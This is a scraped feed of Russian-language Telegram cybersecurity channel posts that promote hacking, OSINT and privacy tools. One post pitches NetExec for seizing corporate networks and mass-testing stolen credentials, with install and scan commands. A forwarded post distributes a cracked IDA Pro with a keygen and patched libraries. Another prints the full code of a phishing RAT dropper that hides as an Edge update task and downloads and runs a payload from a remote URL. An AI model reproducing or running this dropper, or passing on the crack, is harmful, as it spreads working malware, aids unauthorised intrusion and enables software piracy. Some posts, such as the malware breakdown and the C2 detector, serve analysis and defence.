Устали от десяти команд для базового сканирования? Netxec (ранее CrackMapExec) — это не просто сканер, это единый фреймворк для взятия под контроль всей корпоративной сети. Если вам нужно не просто найти уязвимость, а сразу её эксплуатировать, это ваш выбор.
Что умеет эта машинка:
Мгновенная разведка: Сканирование портов, выявление ОС, сбор информации о пользователях и аккаунтах в домене.
Автоматизация атак: Не просто находит уязвимые SMB, RDP, WinRM, SSH, а сразу применяет к ним эксплойты.
Латеральное перемещение: Найдя доступ на одной машине, автоматически распространяет его по всей сети.
Credential Stuffing: Проверяет украденные логины/пароли массово на всех узлах сети.
Stealth-режим: Может работать тихо, имитируя легитимный трафик, чтобы не сработали простые системы защиты.
Установка и использование (оно того стоит):
git clone https://github.com/Pennyw0rth/NetExec
cd NetExec
pipx install .
nxc smb 192.168.1.0/24
Вся мощь — в одной строке.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6
🕵️ Metadata Anonymisation Toolkit (MAT) — очистка метаданных без следов
Metadata Anonymisation Toolkit (MAT / MAT2) — это инструмент для удаления метаданных из файлов, которые могут раскрывать личную информацию: имя автора, устройство, геолокацию, время создания, ПО и даже историю правок.
Используется в OSINT-гигиене, журналистике, ИБ и приватности.
😸 Ссылка на репозиторий
😈 CodeGuard: PySec Edition | Чат
Metadata Anonymisation Toolkit (MAT / MAT2) — это инструмент для удаления метаданных из файлов, которые могут раскрывать личную информацию: имя автора, устройство, геолокацию, время создания, ПО и даже историю правок.
Используется в OSINT-гигиене, журналистике, ИБ и приватности.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6
Проект GeoIntel использует API Gemini от Google для анализа геолокации по снимкам. Загружаете фото — нейросеть помогает понять, где оно было сделано, на основе визуальных данных и метаинформации.
Что умеет:
Анализировать фото через Gemini API
Определять вероятное местоположение по визуальным признакам
Помогать в OSINT-расследованиях и геопоиске
Как работает:
Загружаете изображение → ИИ анализирует архитектуру, природу, детали → выдаёт предположение о регионе или точке съёмки.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4
Изучаем_Kali_Linux.pdf
12 MB
Изучаем Kali Linux. Этичный хакинг
-Глава 1. Основы Kali Linux
-Глава 2. Основы тестирования сетевой безопасности
-Глава 3. Разведка
-Глава 4. Поиск уязвимостей
-Глава 5. Автоматизированные эксплойты
-Глава 6. Освоение Metasploit
-Глава 7. Тестирование беспроводных сетей.
-Глава 8. Тестирование веб-приложений
-Глава 9. Проникновение
-Глава 10. Продвинутые техники и концепции
-Глава 11. Реверс-инжиниринг и анализ
-Глава 12. Цифровая криминалистика
-Глава 13. Создание отчетов.
-Глава 1. Основы Kali Linux
-Глава 2. Основы тестирования сетевой безопасности
-Глава 3. Разведка
-Глава 4. Поиск уязвимостей
-Глава 5. Автоматизированные эксплойты
-Глава 6. Освоение Metasploit
-Глава 7. Тестирование беспроводных сетей.
-Глава 8. Тестирование веб-приложений
-Глава 9. Проникновение
-Глава 10. Продвинутые техники и концепции
-Глава 11. Реверс-инжиниринг и анализ
-Глава 12. Цифровая криминалистика
-Глава 13. Создание отчетов.
❤5
ShadowLab — это образовательный фреймворк командования и управления (C2), разработанный исключительно для исследований в области кибербезопасности, авторизованных оценок безопасности.
Вместо того чтобы служить набором инструментов для атак, проект демонстрирует, как современные инфраструктуры C2 проектируются с помощью прозрачных реализаций зашифрованной связи, генерации полезной нагрузки, внутренних механизмов Windows и модульных рабочих процессов пост-эксплуатации.
Репозиторий : https://github.com/msalihberk/ShadowLab
Вместо того чтобы служить набором инструментов для атак, проект демонстрирует, как современные инфраструктуры C2 проектируются с помощью прозрачных реализаций зашифрованной связи, генерации полезной нагрузки, внутренних механизмов Windows и модульных рабочих процессов пост-эксплуатации.
Репозиторий : https://github.com/msalihberk/ShadowLab
❤6
Obsidian Encrypt — шифрование заметок прямо внутри Obsidian
Obsidian хранит данные в обычных Markdown-файлах, поэтому важные записи могут оказаться открытыми при утечке vault.
Плагин Obsidian Encrypt позволяет:
• шифровать отдельные заметки;
• скрывать чувствительные блоки текста;
• защищать API-ключи, приватные данные и исследовательские записи;
• хранить расшифрованные данные только в памяти.
Полезно для тех, кто использует Obsidian как базу знаний для разработки, OSINT, пентеста или исследований.
Репозиторий: https://github.com/meld-cp/obsidian-encrypt
Obsidian хранит данные в обычных Markdown-файлах, поэтому важные записи могут оказаться открытыми при утечке vault.
Плагин Obsidian Encrypt позволяет:
• шифровать отдельные заметки;
• скрывать чувствительные блоки текста;
• защищать API-ключи, приватные данные и исследовательские записи;
• хранить расшифрованные данные только в памяти.
Полезно для тех, кто использует Obsidian как базу знаний для разработки, OSINT, пентеста или исследований.
Репозиторий: https://github.com/meld-cp/obsidian-encrypt
❤5
Decepticon — AI-агент для автономного пентеста
Open-source платформа, объединяющая несколько специализированных AI-агентов для проведения разведки, поиска уязвимостей, эксплуатации и постэксплуатации.
Проект использует LangGraph, Neo4j и Docker-окружение с Kali Linux, позволяя автоматизировать сложные сценарии Red Team.
Пока такие системы не заменяют специалистов, но уже показывают, в каком направлении развивается offensive security.
GitHub: https://github.com/PurpleAILAB/Decepticon
Open-source платформа, объединяющая несколько специализированных AI-агентов для проведения разведки, поиска уязвимостей, эксплуатации и постэксплуатации.
Проект использует LangGraph, Neo4j и Docker-окружение с Kali Linux, позволяя автоматизировать сложные сценарии Red Team.
Пока такие системы не заменяют специалистов, но уже показывают, в каком направлении развивается offensive security.
GitHub: https://github.com/PurpleAILAB/Decepticon
❤5
Cybersec.pdf
100.9 KB
Как работает цифровая криминалистика в USA и Европе.
Какие инструменты используются от анализа трафика до мобильных устройств.
Какие инструменты используются от анализа трафика до мобильных устройств.
❤6
Reverse Engineering & Malware-Analysis Resources
Это, пожалуй, один из лучших репозиториев по:
Reverse Engineering;
Malware Analysis;
Binary Exploitation;
Firmware;
Frida;
Ghidra;
IDA;
Binary Ninja;
eBPF;
ARM.
Это не просто список ссылок, а огромная база инструментов и материалов.
Репозиторий
Это, пожалуй, один из лучших репозиториев по:
Reverse Engineering;
Malware Analysis;
Binary Exploitation;
Firmware;
Frida;
Ghidra;
IDA;
Binary Ninja;
eBPF;
ARM.
Это не просто список ссылок, а огромная база инструментов и материалов.
Репозиторий
Forwarded from Proxy Bar
IDA pro 9.4
*
Linux + Windows + Mac + ARM
download
*
*
Linux + Windows + Mac + ARM
download
*
tree "/home/data/0x01/IDA/IDA pro 9.4/"
/home/reeves/data/soft/IDA/IDA pro 9.4/
├── ida-pro_94_armlinux.run
├── ida-pro_94_armmac.app.zip
├── ida-pro_94_armwin.exe
├── ida-pro_94_x64linux.run
├── ida-pro_94_x64mac.app.zip
├── ida-pro_94_x64win.exe
├── kg_patch
│ ├── idapro.hexlic
│ ├── keygen.js
│ ├── README
│ ├── x64linux
│ │ ├── libida32.so
│ │ └── libida.so
│ └── x64win
│ ├── ida32.dll
│ └── ida.dll
└── misc
├── hexlicsrv94_x64linux.run
├── hexvault94_x64linux.run
├── idapin94.zip
└── lumina94_x64linux.run
5 directories, 17 files
❤9
Interesting RAT delivered via phishing today
The VBS uses heavy string obfuscation before executing a hidden
- Creates a scheduled task for persistence (every 9 minutes)
- Multi thread cause I am not blueticked 🥳
- Cleaned up VBS screenshot for TLDR
- Downloads
- Saves it as
Something tells me it's not Microsoft 🤣
https://github.com/microsoft-services/
Full code:
Use it for educational purpose only
The VBS uses heavy string obfuscation before executing a hidden
cmd.exe that- Creates a scheduled task for persistence (every 9 minutes)
- Multi thread cause I am not blueticked 🥳
- Cleaned up VBS screenshot for TLDR
- Downloads
GoogleSpace.dat from a GitHub Releases URL- Saves it as
%PUBLIC%\Music\GoogleServices.vbs • Masquerades using a MicrosoftEdgeUpdateTaskMachineCore{GUID} task nameSomething tells me it's not Microsoft 🤣
https://github.com/microsoft-services/
Full code:
Dim shell
Dim command
Set shell = CreateObject("WScript.Shell")
command = "cmd /C " & _
"choice /n /c y /d y /t 30 >nul & " & _
"schtasks /create " & _
" /tn ""MicrosoftEdgeUpdateTaskMachineCore{4CL34008-390A-4893-S0C9-C8B34D3846D8}"" " & _
" /tr ""%PUBLIC%\Music\GoogleServices.vbs"" " & _
" /sc minute /mo 9 /f & " & _
"choice /n /c y /d y /t 30 >nul & " & _
"powershell iwr " & _
"'https://github.com/microsoft-services/staff/releases/download/v0.0.3/GoogleSpace.dat'" & _
" -OutFile ""%env:PUBLIC%\Music\GoogleServices.vbs"" & " & _
"choice /n /c y /d y /t 30 >nul & " & _
"exit"
shell.Run command, 0
Use it for educational purpose only
❤9
Face Search Engines
List of 10 reverse image search engines + Artist Ninja reverse image search.
https://www.faceseek.online/blog/best-face-search-engines
https://artist.ninja/reverse-image-search/
#osint #socmint
List of 10 reverse image search engines + Artist Ninja reverse image search.
https://www.faceseek.online/blog/best-face-search-engines
https://artist.ninja/reverse-image-search/
#osint #socmint
❤5 3👍1
Forwarded from Vaultsec
C2 Traffic Anomaly Detector.pdf
132.7 KB
C2 Traffic Anomaly Detector
Скрипт продавался за 1200$ а на многих «закрытых форумах» и сейчас продается.
- Анализирует PCAP-файлы (дампы трафика).
- Ищет аномальные DNS-запросы (DGA, длинные поддомены, low TTL).
- Обнаруживает
подозрительные TLS сертификаты (самоподписанные, срок < 7 дней, необычные issuer).
- Выявляет регулярные интервалы между пакетами (beaconing).
- Строит граф связей между внутренними IP и внешними хостами.
Скрипт продавался за 1200$ а на многих «закрытых форумах» и сейчас продается.
- Анализирует PCAP-файлы (дампы трафика).
- Ищет аномальные DNS-запросы (DGA, длинные поддомены, low TTL).
- Обнаруживает
подозрительные TLS сертификаты (самоподписанные, срок < 7 дней, необычные issuer).
- Выявляет регулярные интервалы между пакетами (beaconing).
- Строит граф связей между внутренними IP и внешними хостами.
❤6
Forwarded from 🧻 Обходы блокировок YouTube, Discord (ВПН) | Ютуб и Дискорд не работает, ютуб заблокирован замедлили 2026
Репозитории с настоящей малварью. Мы проверили HTTP-коды в тот же день: у чистых проектов 404, у заражённых — 200. И это не пара залётных фейков, а раздачи, которые живут на площадке месяцами и собирают сотни звёзд.
В статье — все проверяемые числа, хэши полезной нагрузки, разбор обоих приёмов сокрытия и готовые команды, которыми ты за минуту проверишь любой репозиторий сам. Плюс отдельно: где предупреждению антивируса стоит верить, а где детект означает лишь «RiskTool» на драйвер WinDivert.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3
Forwarded from 🧻 Обходы блокировок YouTube, Discord (ВПН) | Ютуб и Дискорд не работает, ютуб заблокирован замедлили 2026
🧻 Обходы блокировок YouTube, Discord (ВПН) | Ютуб и Дискорд не работает, ютуб заблокирован замедлили 2026
Продолжение: https://t.me/zapretvirus
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3👍2